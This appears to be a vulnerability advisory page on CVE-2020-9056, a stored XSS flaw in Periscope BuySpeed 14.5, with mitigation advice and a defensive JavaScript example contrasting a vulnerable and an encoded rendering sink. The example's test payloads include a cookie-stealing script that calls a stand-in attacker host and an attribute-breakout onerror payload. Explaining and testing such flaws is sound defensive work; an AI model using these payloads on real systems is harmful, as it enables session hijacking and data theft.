14.5.1
CVE-2020-9056 is a stored cross-site scripting (XSS) vulnerability in Periscope BuySpeed version 14.5. An attacker who can save a malicious script into an application field can have that script executed in the browsers of other users who later view the stored data, compromising their sessions and any data the application displays to them. The issue is fixed in BuySpeed version 15.3.
The primary impact of CVE-2020-9056 is execution of attacker-controlled JavaScript in the context of a victim's authenticated browser session. Typical consequences include redirecting the victim to a phishing site, stealing session cookies to take over the account, and exfiltrating sensitive information rendered in the BuySpeed application. Because the vulnerability is stored rather than reflected, the attacker injects the script once and every user who subsequently loads the affected page runs it, with no link or interaction required on the victim's side. The severity is rated LOW because exploitation requires authenticated access to the application, which limits the attack surface.
CVE-2020-9056 was publicly disclosed on April 10, 2020. No public proof-of-concept exploits are currently known. The vulnerability is not listed on the CISA KEV catalog. Given the LOW CVSS score and lack of public exploits, the probability of active exploitation is considered low.
Exploit Status
EPSS
0.30% (54th percentile)
CVSS Vector
The primary mitigation for CVE-2020-9056 is to upgrade BuySpeed to version 15.3 or later, which contains the vendor fix. If upgrading immediately is not feasible, the interim control is context-aware output encoding of stored, user-supplied data at the point where BuySpeed renders it (HTML body, attribute, and JavaScript contexts each need their own encoding); input validation on its own is not a reliable defense against XSS, since data that is valid for one field can still be dangerous in the context where it is later displayed. A Web Application Firewall (WAF) with XSS rules adds a further layer, but it is signature-based and can be bypassed, so treat it as defense in depth rather than a fix. After upgrading, confirm the fix in a test environment, with authorization, by storing a harmless JavaScript payload in a user-controlled field and verifying in a browser that it is rendered as text rather than executed.
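The following is an added example for this page, not code from Periscope BuySpeed or its vendor. It shows the pattern behind a stored XSS in a rendering sink (stored fields concatenated into markup) next to the hardened form that encodes each field for its output context, and an offline check of the kind a team can run in CI to confirm a stored payload no longer produces live markup. The field names, template, and payloads are hypothetical and constructed for the example; it runs under Node.js with no DOM.

```javascript
// Added example (not Periscope BuySpeed code): stored-XSS sink, its hardened
// form, and a markup audit used to verify that stored data stays inert.

// Constructed payloads of the kind an authenticated user could save into a
// free-text field and have rendered to every later viewer of that record.
const STORED_PAYLOADS = {
  bodyScript: '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
  attrBreakout: '"><img src=x onerror=alert(document.cookie)>',
};

// Output encoding for HTML text and double-quoted attribute contexts.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable sink: stored fields concatenated straight into markup.
function renderNoteVulnerable(note) {
  return `<div class="note" title="${note.author}">${note.body}</div>`;
}

// Hardened sink: each stored field is encoded for the context it lands in.
function renderNoteSafe(note) {
  return `<div class="note" title="${escapeHtml(note.author)}">${escapeHtml(note.body)}</div>`;
}

// Extract tag names and any on* event-handler attribute names from markup.
// Deliberately small tokenizer for a CI check, not a full HTML parser; the
// authoritative test is still loading the page in a real browser.
function auditMarkup(html) {
  const tags = [];
  const handlers = [];
  const tagRe = /<(\/?)([a-zA-Z][a-zA-Z0-9]*)([^>]*)>/g;
  // Attribute name, optionally followed by a quoted or unquoted value.
  const attrRe = /([^\s="'<>\/]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+))?/g;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const [, slash, name, attrText] = m;
    tags.push(slash + name.toLowerCase());
    let a;
    while ((a = attrRe.exec(attrText)) !== null) {
      if (/^on/i.test(a[1])) handlers.push(a[1].toLowerCase());
    }
  }
  return { tags, handlers };
}

// The template emits exactly one <div>...</div>. Any extra tag, or any event
// handler attribute, means stored data was interpreted as markup.
function payloadNeutralised(rendered) {
  const { tags, handlers } = auditMarkup(rendered);
  return handlers.length === 0 && tags.join(',') === 'div,/div';
}

const note = { author: STORED_PAYLOADS.attrBreakout, body: STORED_PAYLOADS.bodyScript };
console.log('vulnerable neutralised:', payloadNeutralised(renderNoteVulnerable(note)));
console.log('hardened neutralised:  ', payloadNeutralised(renderNoteSafe(note)));
```

The audit deliberately parses attributes, so an encoded `onerror=` sitting inside a quoted title value is not flagged, while the same text breaking out of the attribute in the vulnerable rendering is. Note that `escapeHtml` is only correct for HTML text and quoted attributes; a value inserted into a `<script>` block, a URL, or CSS needs the encoder for that context.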
Update BuySpeed to version 15.3 or higher. This version contains the fix for the stored Cross-Site Scripting (XSS) vulnerability.
CVE-2020-9056 is a stored cross-site scripting vulnerability in Periscope BuySpeed version 14.5, allowing attackers to inject JavaScript code.
If you are using Periscope BuySpeed version 14.5, you are potentially affected and should upgrade immediately.
Upgrade to version 15.3 or later to resolve the vulnerability. Context-aware output encoding of stored user data, with WAF XSS rules as defense in depth, are the interim measures until the upgrade is done.
Currently, there are no known public exploits or confirmed active exploitation campaigns for CVE-2020-9056.
Refer to the Periscope BuySpeed release notes and security advisories on the Periscope website for details.